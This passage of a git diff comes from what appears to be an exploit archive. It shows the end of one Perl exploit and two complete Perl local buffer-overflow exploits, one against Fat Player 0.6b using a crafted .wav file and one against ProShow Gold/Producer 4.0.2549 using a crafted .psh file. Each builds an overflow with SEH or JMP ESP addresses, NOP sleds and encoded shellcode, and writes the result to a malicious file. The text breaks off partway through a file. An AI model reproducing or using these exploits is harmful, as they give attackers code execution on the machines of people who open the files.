+"cell[0].images[0].objectId=1\n".
+"cell[0].images[0].videoSpeed=100\n".
+"cell[0].images[0].nrOfKeyframes=2\n".
+"cell[0].images[0].keyframes[0].timeSegment=1\n".
+"cell[0].images[0].keyframes[0].attributeMask=-1\n".
+"cell[0].images[0].keyframes[0].zoomX=10000\n".
+"cell[0].images[0].keyframes[0].zoomY=10000\n".
+"cell[0].images[0].keyframes[0].panAccelType=1\n".
+"cell[0].images[0].keyframes[0].zoomXAccelType=1\n".
+"cell[0].images[0].keyframes[0].zoomYAccelType=1\n".
+"cell[0].images[0].keyframes[0].rotationAccelType=1\n".
+"cell[0].images[0].keyframes[0].motionSmoothness=-1\n".
+"cell[0].images[0].keyframes[0].lockAR=1\n".
+"cell[0].images[0].keyframes[0].transparency=0\n".
+"cell[0].images[0].keyframes[0].colorizeColor=8421504\n".
+"cell[0].images[0].keyframes[0].colorizeStrength=10000\n".
+"cell[0].images[0].keyframes[0].shadowOffsetX=70\n".
+"cell[0].images[0].keyframes[0].shadowOffsetY=70\n".
+"cell[0].images[0].keyframes[1].timestamp=10000\n".
+"cell[0].images[0].keyframes[1].timeSegment=3\n".
+"cell[0].images[0].keyframes[1].segmentTimestamp=10000\n".
+"cell[0].images[0].keyframes[1].attributeMask=-1\n".
+"cell[0].images[0].keyframes[1].zoomX=10000\n".
+"cell[0].images[0].keyframes[1].zoomY=10000\n".
+"cell[0].images[0].keyframes[1].panAccelType=1\n".
+"cell[0].images[0].keyframes[1].zoomXAccelType=1\n".
+"cell[0].images[0].keyframes[1].zoomYAccelType=1\n".
+"cell[0].images[0].keyframes[1].rotationAccelType=1\n".
+"cell[0].images[0].keyframes[1].motionSmoothness=-1\n".
+"cell[0].images[0].keyframes[1].lockAR=1\n".
+"cell[0].images[0].keyframes[1].transparency=0\n".
+"cell[0].images[0].keyframes[1].colorizeColor=8421504\n".
+"cell[0].images[0].keyframes[1].colorizeStrength=10000\n".
+"cell[0].images[0].keyframes[1].shadowOffsetX=70\n".
+"cell[0].images[0].keyframes[1].shadowOffsetY=70\n".
+"cell[0].background=1\n".
+"cell[0].bgDefault=1\n".
+"cell[0].bgSizeMode=1\n".
+"cell[0].bgColorizeColor=8421504\n".
+"cell[0].sound.useDefault=1\n".
+"cell[0].sound.volume=100\n".
+"cell[0].sound.fadeIn=100\n".
+"cell[0].sound.fadeOut=100\n".
+"cell[0].sound.async=1\n".
+"cell[0].sound.musicUseDefault=1\n".
+"cell[0].sound.musicVolume=50\n".
+"cell[0].sound.musicFadeIn=100\n".
+"cell[0].sound.musicFadeOut=100\n".
+"cell[0].musicVolumeOffset=50\n".
+"cell[0].time=3000\n".
+"cell[0].transId=2\n".
+"cell[0].transTime=3000\n".
+"cell[0].includeGlobalCaptions=1\n".
+"cell[1].imageEnable=1\n".
+"cell[1].nrOfImages=1\n".
+"cell[1].images[0].image=../../../../../Media Sources/ProShow Gold - Built-In Content/Backgrounds/Abstract_01.jpg\n".
+"cell[1].images[0].imageEnable=1\n".
+"cell[1].images[0].name=Abstract_01\n".
+"cell[1].images[0].replaceableTemplate=1\n".
+"cell[1].images[0].sizeMode=1\n".
+"cell[1].images[0].colorizeColor=8421504\n".
+"cell[1].images[0].colorizeStrength=10000\n".
+"cell[1].images[0].outlineColor=16777215\n".
+"cell[1].images[0].aspectX=4\n".
+"cell[1].images[0].aspectY=3\n".
+"cell[1].images[0].videoVolume=100\n".
+"cell[1].images[0].objectId=2\n".
+"cell[1].images[0].videoSpeed=100\n".
+"cell[1].images[0].nrOfKeyframes=2\n".
+"cell[1].images[0].keyframes[0].timeSegment=1\n".
+"cell[1].images[0].keyframes[0].attributeMask=-1\n".
+"cell[1].images[0].keyframes[0].zoomX=10000\n".
+"cell[1].images[0].keyframes[0].zoomY=10000\n".
+"cell[1].images[0].keyframes[0].panAccelType=1\n".
+"cell[1].images[0].keyframes[0].zoomXAccelType=1\n".
+"cell[1].images[0].keyframes[0].zoomYAccelType=1\n".
+"cell[1].images[0].keyframes[0].rotationAccelType=1\n".
+"cell[1].images[0].keyframes[0].motionSmoothness=-1\n".
+"cell[1].images[0].keyframes[0].lockAR=1\n".
+"cell[1].images[0].keyframes[0].transparency=0\n".
+"cell[1].images[0].keyframes[0].colorizeColor=8421504\n".
+"cell[1].images[0].keyframes[0].colorizeStrength=10000\n".
+"cell[1].images[0].keyframes[0].shadowOffsetX=70\n".
+"cell[1].images[0].keyframes[0].shadowOffsetY=70\n".
+"cell[1].images[0].keyframes[1].timestamp=10000\n".
+"cell[1].images[0].keyframes[1].timeSegment=3\n".
+"cell[1].images[0].keyframes[1].segmentTimestamp=10000\n".
+"cell[1].images[0].keyframes[1].attributeMask=-1\n".
+"cell[1].images[0].keyframes[1].zoomX=10000\n".
+"cell[1].images[0].keyframes[1].zoomY=10000\n".
+"cell[1].images[0].keyframes[1].panAccelType=1\n".
+"cell[1].images[0].keyframes[1].zoomXAccelType=1\n".
+"cell[1].images[0].keyframes[1].zoomYAccelType=1\n".
+"cell[1].images[0].keyframes[1].rotationAccelType=1\n".
+"cell[1].images[0].keyframes[1].motionSmoothness=-1\n".
+"cell[1].images[0].keyframes[1].lockAR=1\n".
+"cell[1].images[0].keyframes[1].transparency=0\n".
+"cell[1].images[0].keyframes[1].colorizeColor=8421504\n".
+"cell[1].images[0].keyframes[1].colorizeStrength=10000\n".
+"cell[1].images[0].keyframes[1].shadowOffsetX=70\n".
+"cell[1].images[0].keyframes[1].shadowOffsetY=70\n".
+"cell[1].background=1\n".
+"cell[1].bgDefault=1\n".
+"cell[1].bgSizeMode=1\n".
+"cell[1].bgColorizeColor=8421504\n".
+"cell[1].sound.useDefault=1\n".
+"cell[1].sound.volume=100\n".
+"cell[1].sound.fadeIn=100\n".
+"cell[1].sound.fadeOut=100\n".
+"cell[1].sound.async=1\n".
+"cell[1].sound.musicUseDefault=1\n".
+"cell[1].sound.musicVolume=50\n".
+"cell[1].sound.musicFadeIn=100\n".
+"cell[1].sound.musicFadeOut=100\n".
+"cell[1].musicVolumeOffset=50\n".
+"cell[1].time=3000\n".
+"cell[1].transId=2\n".
+"cell[1].transTime=3000\n".
+"cell[1].includeGlobalCaptions=1\n".
+"modifierCount=0\n";
+
+my $payload = $fileheader.$junk.$nseh.$seh.$nop.$shellcode.$junk2.$filefooter;
+
+print " [+] Writing payload to file\n";
+open($FILE,">$sploitfile");
+print $FILE $payload;
+close($FILE);
+print " [+] Exploit file " . $sploitfile . " created\n";
+print " [+] Wrote " . length($payload) . " bytes\n";
+
+# milw0rm.com [2009-08-24]
diff --git a/platforms/windows/local/9495.pl b/platforms/windows/local/9495.pl
index 2846291f9..bda8633e2 100755
--- a/platforms/windows/local/9495.pl
+++ b/platforms/windows/local/9495.pl
@@ -1,41 +1,41 @@
-#!/usr/bin/perl
-# by ahwak2000
-# email: 0.w[at]w.cn
-#Tested on Windows XP SP3 (English)
-# Fat Player 0.6b(wav) Universal Local Buffer Exploit
-#http://sourceforge.net/projects/fatplayer/
-###################################################################
-my $shellcode=
-"\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49".
-"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56".
-"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41".
-"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42".
-"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a".
-"\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47".
-"\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c".
-"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a".
-"\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46".
-"\x51\x49\x50\x4c\x59\x4e\x4c\x4d\x54\x49\x50\x42\x54\x45".
-"\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c".
-"\x34\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4b\x55\x4c".
-"\x4b\x51\x4f\x47\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44".
-"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c".
-"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4c\x49\x51\x4c\x46".
-"\x44\x44\x44\x48\x43\x51\x4f\x50\x31\x4a\x56\x45\x30\x50".
-"\x56\x42\x44\x4c\x4b\x51\x56\x50\x30\x4c\x4b\x51\x50\x44".
-"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45".
-"\x58\x4b\x39\x4a\x58\x4d\x53\x49\x50\x42\x4a\x50\x50\x43".
-"\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x45\x38\x4a\x38\x4b".
-"\x4e\x4c\x4a\x44\x4e\x50\x57\x4b\x4f\x4d\x37\x42\x43\x43".
-"\x51\x42\x4c\x42\x43\x43\x30\x41\x41";
-###################################################################
-my $overflow="\x41" x 4124;
-my $sh= "\xEB\x09\x90\x90";#short jump
-my $jmp="\x1F\x22\x44\x00";# Universal  -- 004422    .  FFE4               JMP ESP
-my $nop="\x90" x 20;
-###################################################################
-open(myfile,'>> ahwak2000.wav');
-print myfile $overflow.$sh.$jmp.$nop.$shellcode;
-###################################################################
-
-# milw0rm.com [2009-08-24]
+#!/usr/bin/perl
+# by ahwak2000
+# email: 0.w[at]w.cn
+#Tested on Windows XP SP3 (English)
+# Fat Player 0.6b(wav) Universal Local Buffer Exploit
+#http://sourceforge.net/projects/fatplayer/
+###################################################################
+my $shellcode=
+"\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49".
+"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56".
+"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41".
+"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42".
+"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a".
+"\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47".
+"\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c".
+"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a".
+"\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46".
+"\x51\x49\x50\x4c\x59\x4e\x4c\x4d\x54\x49\x50\x42\x54\x45".
+"\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c".
+"\x34\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4b\x55\x4c".
+"\x4b\x51\x4f\x47\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44".
+"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c".
+"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4c\x49\x51\x4c\x46".
+"\x44\x44\x44\x48\x43\x51\x4f\x50\x31\x4a\x56\x45\x30\x50".
+"\x56\x42\x44\x4c\x4b\x51\x56\x50\x30\x4c\x4b\x51\x50\x44".
+"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45".
+"\x58\x4b\x39\x4a\x58\x4d\x53\x49\x50\x42\x4a\x50\x50\x43".
+"\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x45\x38\x4a\x38\x4b".
+"\x4e\x4c\x4a\x44\x4e\x50\x57\x4b\x4f\x4d\x37\x42\x43\x43".
+"\x51\x42\x4c\x42\x43\x43\x30\x41\x41";
+###################################################################
+my $overflow="\x41" x 4124;
+my $sh= "\xEB\x09\x90\x90";#short jump
+my $jmp="\x1F\x22\x44\x00";# Universal  -- 004422    .  FFE4               JMP ESP
+my $nop="\x90" x 20;
+###################################################################
+open(myfile,'>> ahwak2000.wav');
+print myfile $overflow.$sh.$jmp.$nop.$shellcode;
+###################################################################
+
+# milw0rm.com [2009-08-24]
diff --git a/platforms/windows/local/9519.pl b/platforms/windows/local/9519.pl
index 1cdc59296..f5e8e7ef7 100755
--- a/platforms/windows/local/9519.pl
+++ b/platforms/windows/local/9519.pl
@@ -1,226 +1,226 @@
-#!/usr/bin/perl
-# by hack4love
-# hack4love@hotmail.com
-# ProShow Producer //ProShow Gold v 4.0.2549(.psh) Universal Local BOF SEH
-##########################################################################
-##http://files.photodex.com/release/psgold_40_2549.exe
-##http://files.photodex.com/release/pspro_40_2549.exe
-###########################################################################
-##THIS EXPLOIT WORK SO GOOD FOR THE TWO PROGRAM############################
-###########################################################################
-##FIRST WAS BY corelanc0d3r################################################
-###########################################################################
-my $header="Photodex(R) ProShow(TM) Show File Version=0\n".
-"proshowVersion=2549\n".
-"title=Untitled ProShow 1\n".
-"fileName=proshowsploit.psh\n".
-"description=''\n".
-"showAspect=1\n".
-"showSizeX=16\n".
-"showSizeY=9\n".
-"loop=1\n".
-"loopRestart=1\n".
-"displaySizeX=704\n".
-"displaySizeY=528\n".
-"videoSizeX=720\n".
-"videoSizeY=480\n".
-"videoFrameRate=29970\n".
-"videoBitRate=1120000\n".
-"videoMuxBitRate=1394400\n".
-"outputImageSizeX=1024\n".
-"outputImageSizeY=768\n".
-"outputQuality=80\n".
-"toolbarEnable=1\n".
-"allowQuit=1\n".
-"allowPlay=1\n".
-"allowTime=1\n".
-"allowRestart=1\n".
-"allowSave=1\n".
-"allowSaveAll=1\n".
-"allowPrint=1\n".
-"allowPrintAll=1\n".
-"allowCopy=1\n".
-"allowSaver=1\n".
-"allowCta=1\n".
-"ctaLabel=ProShow Info\n".
-"ctaURL=http://www.photodex.com/\n".
-"background=1\n".
-"bgOutlineColor=0\n".
-"bgSizeMode=1\n".
-"bgColorizeColor=8421504\n".
-"waterOpacity=128\n".
-"waterZoom=10000\n".
-"waterColorizeColor=8421504\n".
-"musicVolumeOffset=100\n".
-"defaultCellVolumeOffset=100\n".
-"defaultCellFadeIn=100\n".
-"defaultCellFadeOut=100\n".
-"defaultMusicVolumeOffset=50\n".
-"defaultMusicFadeIn=100\n".
-"defaultMusicFadeOut=100\n".
-"maxDispWidth=800\n".
-"maxDispHeight=600\n".
-"maxRender=1\n".
-"maxRenderWidth=800\n".
-"maxRenderHeight=600\n".
-"randomTransitions=FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF\n".
-"makeFileLocalFolder=c:/\n".
-"cells=2\n".
-"cell[0].imageEnable=1\n".
-"cell[0].nrOfImages=1\n".
-"cell[0].images[0].image=../../../../../Media Sources/ProShow Gold - Built-In Content/Backgrounds/Abstract_02.jpg";
-####################################################################################
-my $bof="\x41" x 6151;
-my $nsh="\xEB\x06\x90\x90";
-my $seh="\xf9\x4c\x1a\x10";####Universal ##if.dnt
-my $nop="\x90" x 20;
-my $sec=
-"\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc2".
-"\xf8\x23\x02\x83\xeb\xfc\xe2\xf4\x3e\x10\x67\x02\xc2\xf8\xa8\x47".
-"\xfe\x73\x5f\x07\xba\xf9\xcc\x89\x8d\xe0\xa8\x5d\xe2\xf9\xc8\x4b".
-"\x49\xcc\xa8\x03\x2c\xc9\xe3\x9b\x6e\x7c\xe3\x76\xc5\x39\xe9\x0f".
-"\xc3\x3a\xc8\xf6\xf9\xac\x07\x06\xb7\x1d\xa8\x5d\xe6\xf9\xc8\x64".
-"\x49\xf4\x68\x89\x9d\xe4\x22\xe9\x49\xe4\xa8\x03\x29\x71\x7f\x26".
-"\xc6\x3b\x12\xc2\xa6\x73\x63\x32\x47\x38\x5b\x0e\x49\xb8\x2f\x89".
-"\xb2\xe4\x8e\x89\xaa\xf0\xc8\x0b\x49\x78\x93\x02\xc2\xf8\xa8\x6a".
-"\xfe\xa7\x12\xf4\xa2\xae\xaa\xfa\x41\x38\x58\x52\xaa\x08\xa9\x06".
-"\x9d\x90\xbb\xfc\x48\xf6\x74\xfd\x25\x9b\x42\x6e\xa1\xf8\x23\x02";
-###############################################################################
-my $header2 = "\ncell[0].images[0].imageEnable=1\n".
-"cell[0].images[0].name=Abstract_02\n".
-"cell[0].images[0].replaceableTemplate=1\n".
-"cell[0].images[0].sizeMode=1\n".
-"cell[0].images[0].colorizeColor=8421504\n".
-"cell[0].images[0].colorizeStrength=10000\n".
-"cell[0].images[0].outlineColor=16777215\n".
-"cell[0].images[0].aspectX=4\n".
-"cell[0].images[0].aspectY=3\n".
-"cell[0].images[0].videoVolume=100\n".
-"cell[0].images[0].objectId=1\n".
-"cell[0].images[0].videoSpeed=100\n".
-"cell[0].images[0].nrOfKeyframes=2\n".
-"cell[0].images[0].keyframes[0].timeSegment=1\n".
-"cell[0].images[0].keyframes[0].attributeMask=-1\n".
-"cell[0].images[0].keyframes[0].zoomX=10000\n".
-"cell[0].images[0].keyframes[0].zoomY=10000\n".
-"cell[0].images[0].keyframes[0].panAccelType=1\n".
-"cell[0].images[0].keyframes[0].zoomXAccelType=1\n".
-"cell[0].images[0].keyframes[0].zoomYAccelType=1\n".
-"cell[0].images[0].keyframes[0].rotationAccelType=1\n".
-"cell[0].images[0].keyframes[0].motionSmoothness=-1\n".
-"cell[0].images[0].keyframes[0].lockAR=1\n".
-"cell[0].images[0].keyframes[0].transparency=0\n".
-"cell[0].images[0].keyframes[0].colorizeColor=8421504\n".
-"cell[0].images[0].keyframes[0].colorizeStrength=10000\n".
-"cell[0].images[0].keyframes[0].shadowOffsetX=70\n".
-"cell[0].images[0].keyframes[0].shadowOffsetY=70\n".
-"cell[0].images[0].keyframes[1].timestamp=10000\n".
-"cell[0].images[0].keyframes[1].timeSegment=3\n".
-"cell[0].images[0].keyframes[1].segmentTimestamp=10000\n".
-"cell[0].images[0].keyframes[1].attributeMask=-1\n".
-"cell[0].images[0].keyframes[1].zoomX=10000\n".
-"cell[0].images[0].keyframes[1].zoomY=10000\n".
-"cell[0].images[0].keyframes[1].panAccelType=1\n".
-"cell[0].images[0].keyframes[1].zoomXAccelType=1\n".
-"cell[0].images[0].keyframes[1].zoomYAccelType=1\n".
-"cell[0].images[0].keyframes[1].rotationAccelType=1\n".
-"cell[0].images[0].keyframes[1].motionSmoothness=-1\n".
-"cell[0].images[0].keyframes[1].lockAR=1\n".
-"cell[0].images[0].keyframes[1].transparency=0\n".
-"cell[0].images[0].keyframes[1].colorizeColor=8421504\n".
-"cell[0].images[0].keyframes[1].colorizeStrength=10000\n".
-"cell[0].images[0].keyframes[1].shadowOffsetX=70\n".
-"cell[0].images[0].keyframes[1].shadowOffsetY=70\n".
-"cell[0].background=1\n".
-"cell[0].bgDefault=1\n".
-"cell[0].bgSizeMode=1\n".
-"cell[0].bgColorizeColor=8421504\n".
-"cell[0].sound.useDefault=1\n".
-"cell[0].sound.volume=100\n".
-"cell[0].sound.fadeIn=100\n".
-"cell[0].sound.fadeOut=100\n".
-"cell[0].sound.async=1\n".
-"cell[0].sound.musicUseDefault=1\n".
-"cell[0].sound.musicVolume=50\n".
-"cell[0].sound.musicFadeIn=100\n".
-"cell[0].sound.musicFadeOut=100\n".
-"cell[0].musicVolumeOffset=50\n".
-"cell[0].time=3000\n".
-"cell[0].transId=2\n".
-"cell[0].transTime=3000\n".
-"cell[0].includeGlobalCaptions=1\n".
-"cell[1].imageEnable=1\n".
-"cell[1].nrOfImages=1\n".
-"cell[1].images[0].image=../../../../../Media Sources/ProShow Gold - Built-In Content/Backgrounds/Abstract_01.jpg\n".
-"cell[1].images[0].imageEnable=1\n".
-"cell[1].images[0].name=Abstract_01\n".
-"cell[1].images[0].replaceableTemplate=1\n".
-"cell[1].images[0].sizeMode=1\n".
-"cell[1].images[0].colorizeColor=8421504\n".
-"cell[1].images[0].colorizeStrength=10000\n".
-"cell[1].images[0].outlineColor=16777215\n".
-"cell[1].images[0].aspectX=4\n".
-"cell[1].images[0].aspectY=3\n".
-"cell[1].images[0].videoVolume=100\n".
-"cell[1].images[0].objectId=2\n".
-"cell[1].images[0].videoSpeed=100\n".
-"cell[1].images[0].nrOfKeyframes=2\n".
-"cell[1].images[0].keyframes[0].timeSegment=1\n".
-"cell[1].images[0].keyframes[0].attributeMask=-1\n".
-"cell[1].images[0].keyframes[0].zoomX=10000\n".
-"cell[1].images[0].keyframes[0].zoomY=10000\n".
-"cell[1].images[0].keyframes[0].panAccelType=1\n".
-"cell[1].images[0].keyframes[0].zoomXAccelType=1\n".
-"cell[1].images[0].keyframes[0].zoomYAccelType=1\n".
-"cell[1].images[0].keyframes[0].rotationAccelType=1\n".
-"cell[1].images[0].keyframes[0].motionSmoothness=-1\n".
-"cell[1].images[0].keyframes[0].lockAR=1\n".
-"cell[1].images[0].keyframes[0].transparency=0\n".
-"cell[1].images[0].keyframes[0].colorizeColor=8421504\n".
-"cell[1].images[0].keyframes[0].colorizeStrength=10000\n".
-"cell[1].images[0].keyframes[0].shadowOffsetX=70\n".
-"cell[1].images[0].keyframes[0].shadowOffsetY=70\n".
-"cell[1].images[0].keyframes[1].timestamp=10000\n".
-"cell[1].images[0].keyframes[1].timeSegment=3\n".
-"cell[1].images[0].keyframes[1].segmentTimestamp=10000\n".
-"cell[1].images[0].keyframes[1].attributeMask=-1\n".
-"cell[1].images[0].keyframes[1].zoomX=10000\n".
-"cell[1].images[0].keyframes[1].zoomY=10000\n".
-"cell[1].images[0].keyframes[1].panAccelType=1\n".
-"cell[1].images[0].keyframes[1].zoomXAccelType=1\n".
-"cell[1].images[0].keyframes[1].zoomYAccelType=1\n".
-"cell[1].images[0].keyframes[1].rotationAccelType=1\n".
-"cell[1].images[0].keyframes[1].motionSmoothness=-1\n".
-"cell[1].images[0].keyframes[1].lockAR=1\n".
-"cell[1].images[0].keyframes[1].transparency=0\n".
-"cell[1].images[0].keyframes[1].colorizeColor=8421504\n".
-"cell[1].images[0].keyframes[1].colorizeStrength=10000\n".
-"cell[1].images[0].keyframes[1].shadowOffsetX=70\n".
-"cell[1].images[0].keyframes[1].shadowOffsetY=70\n".
-"cell[1].background=1\n".
-"cell[1].bgDefault=1\n".
-"cell[1].bgSizeMode=1\n".
-"cell[1].bgColorizeColor=8421504\n".
-"cell[1].sound.useDefault=1\n".
-"cell[1].sound.volume=100\n".
-"cell[1].sound.fadeIn=100\n".
-"cell[1].sound.fadeOut=100\n".
-"cell[1].sound.async=1\n".
-"cell[1].sound.musicUseDefault=1\n".
-"cell[1].sound.musicVolume=50\n".
-"cell[1].sound.musicFadeIn=100\n".
-"cell[1].sound.musicFadeOut=100\n".
-"cell[1].musicVolumeOffset=50\n".
-"cell[1].time=3000\n".
-"cell[1].transId=2\n".
-"cell[1].transTime=3000\n".
-"cell[1].includeGlobalCaptions=1\n".
-"modifierCount=0\n";
-print $header.$bof.$nsh.$seh.$nop.$sec.$header2;
-################################################################################
-###################################################################
-open(myfile,'>> HACK4LOVE.psh');
-print myfile $header.$bof.$nsh.$seh.$nop.$sec.$header2;
-##################################################################
-
-# milw0rm.com [2009-08-25]
+#!/usr/bin/perl
+# by hack4love
+# hack4love@hotmail.com
+# ProShow Producer //ProShow Gold v 4.0.2549(.psh) Universal Local BOF SEH
+##########################################################################
+##http://files.photodex.com/release/psgold_40_2549.exe
+##http://files.photodex.com/release/pspro_40_2549.exe
+###########################################################################
+##THIS EXPLOIT WORK SO GOOD FOR THE TWO PROGRAM############################
+###########################################################################
+##FIRST WAS BY corelanc0d3r################################################
+###########################################################################
+my $header="Photodex(R) ProShow(TM) Show File Version=0\n".
+"proshowVersion=2549\n".
+"title=Untitled ProShow 1\n".
+"fileName=proshowsploit.psh\n".
+"description=''\n".
+"showAspect=1\n".
+"showSizeX=16\n".
+"showSizeY=9\n".
+"loop=1\n".
+"loopRestart=1\n".
+"displaySizeX=704\n".
+"displaySizeY=528\n".
+"videoSizeX=720\n".
+"videoSizeY=480\n".
+"videoFrameRate=29970\n".
+"videoBitRate=1120000\n".
+"videoMuxBitRate=1394400\n".
+"outputImageSizeX=1024\n".
+"outputImageSizeY=768\n".
+"outputQuality=80\n".
+"toolbarEnable=1\n".
+"allowQuit=1\n".
+"allowPlay=1\n".
+"allowTime=1\n".
+"allowRestart=1\n".
+"allowSave=1\n".
+"allowSaveAll=1\n".
+"allowPrint=1\n".
+"allowPrintAll=1\n".
+"allowCopy=1\n".
+"allowSaver=1\n".
+"allowCta=1\n".
+"ctaLabel=ProShow Info\n".
+"ctaURL=http://www.photodex.com/\n".
+"background=1\n".
+"bgOutlineColor=0\n".
+"bgSizeMode=1\n".
+"bgColorizeColor=8421504\n".
+"waterOpacity=128\n".
+"waterZoom=10000\n".
+"waterColorizeColor=8421504\n".
+"musicVolumeOffset=100\n".
+"defaultCellVolumeOffset=100\n".
+"defaultCellFadeIn=100\n".
+"defaultCellFadeOut=100\n".
+"defaultMusicVolumeOffset=50\n".
+"defaultMusicFadeIn=100\n".
+"defaultMusicFadeOut=100\n".
+"maxDispWidth=800\n".
+"maxDispHeight=600\n".
+"maxRender=1\n".
+"maxRenderWidth=800\n".
+"maxRenderHeight=600\n".
+"randomTransitions=FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF\n".
+"makeFileLocalFolder=c:/\n".
+"cells=2\n".
+"cell[0].imageEnable=1\n".
+"cell[0].nrOfImages=1\n".
+"cell[0].images[0].image=../../../../../Media Sources/ProShow Gold - Built-In Content/Backgrounds/Abstract_02.jpg";
+####################################################################################
+my $bof="\x41" x 6151;
+my $nsh="\xEB\x06\x90\x90";
+my $seh="\xf9\x4c\x1a\x10";####Universal ##if.dnt
+my $nop="\x90" x 20;
+my $sec=
+"\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc2".
+"\xf8\x23\x02\x83\xeb\xfc\xe2\xf4\x3e\x10\x67\x02\xc2\xf8\xa8\x47".
+"\xfe\x73\x5f\x07\xba\xf9\xcc\x89\x8d\xe0\xa8\x5d\xe2\xf9\xc8\x4b".
+"\x49\xcc\xa8\x03\x2c\xc9\xe3\x9b\x6e\x7c\xe3\x76\xc5\x39\xe9\x0f".
+"\xc3\x3a\xc8\xf6\xf9\xac\x07\x06\xb7\x1d\xa8\x5d\xe6\xf9\xc8\x64".
+"\x49\xf4\x68\x89\x9d\xe4\x22\xe9\x49\xe4\xa8\x03\x29\x71\x7f\x26".
+"\xc6\x3b\x12\xc2\xa6\x73\x63\x32\x47\x38\x5b\x0e\x49\xb8\x2f\x89".
+"\xb2\xe4\x8e\x89\xaa\xf0\xc8\x0b\x49\x78\x93\x02\xc2\xf8\xa8\x6a".
+"\xfe\xa7\x12\xf4\xa2\xae\xaa\xfa\x41\x38\x58\x52\xaa\x08\xa9\x06".
+"\x9d\x90\xbb\xfc\x48\xf6\x74\xfd\x25\x9b\x42\x6e\xa1\xf8\x23\x02";
+###############################################################################
+my $header2 = "\ncell[0].images[0].imageEnable=1\n".
+"cell[0].images[0].name=Abstract_02\n".
+"cell[0].images[0].replaceableTemplate=1\n".
+"cell[0].images[0].sizeMode=1\n".
+"cell[0].images[0].colorizeColor=8421504\n".
+"cell[0].images[0].colorizeStrength=10000\n".
+"cell[0].images[0].outlineColor=16777215\n".
+"cell[0].images[0].aspectX=4\n".
+"cell[0].images[0].aspectY=3\n".
+"cell[0].images[0].videoVolume=100\n".
+"cell[0].images[0].objectId=1\n".
+"cell[0].images[0].videoSpeed=100\n".
+"cell[0].images[0].nrOfKeyframes=2\n".
+"cell[0].images[0].keyframes[0].timeSegment=1\n".
+"cell[0].images[0].keyframes[0].attributeMask=-1\n".
+"cell[0].images[0].keyframes[0].zoomX=10000\n".
+"cell[0].images[0].keyframes[0].zoomY=10000\n".
+"cell[0].images[0].keyframes[0].panAccelType=1\n".
+"cell[0].images[0].keyframes[0].zoomXAccelType=1\n".
+"cell[0].images[0].keyframes[0].zoomYAccelType=1\n".
+"cell[0].images[0].keyframes[0].rotationAccelType=1\n".
+"cell[0].images[0].keyframes[0].motionSmoothness=-1\n".
+"cell[0].images[0].keyframes[0].lockAR=1\n".
+"cell[0].images[0].keyframes[0].transparency=0\n".
+"cell[0].images[0].keyframes[0].colorizeColor=8421504\n".
+"cell[0].images[0].keyframes[0].colorizeStrength=10000\n".
+"cell[0].images[0].keyframes[0].shadowOffsetX=70\n".
+"cell[0].images[0].keyframes[0].shadowOffsetY=70\n".
+"cell[0].images[0].keyframes[1].timestamp=10000\n".
+"cell[0].images[0].keyframes[1].timeSegment=3\n".
+"cell[0].images[0].keyframes[1].segmentTimestamp=10000\n".
+"cell[0].images[0].keyframes[1].attributeMask=-1\n".
+"cell[0].images[0].keyframes[1].zoomX=10000\n".
+"cell[0].images[0].keyframes[1].zoomY=10000\n".
+"cell[0].images[0].keyframes[1].panAccelType=1\n".
+"cell[0].images[0].keyframes[1].zoomXAccelType=1\n".
+"cell[0].images[0].keyframes[1].zoomYAccelType=1\n".
+"cell[0].images[0].keyframes[1].rotationAccelType=1\n".
+"cell[0].images[0].keyframes[1].motionSmoothness=-1\n".
+"cell[0].images[0].keyframes[1].lockAR=1\n".
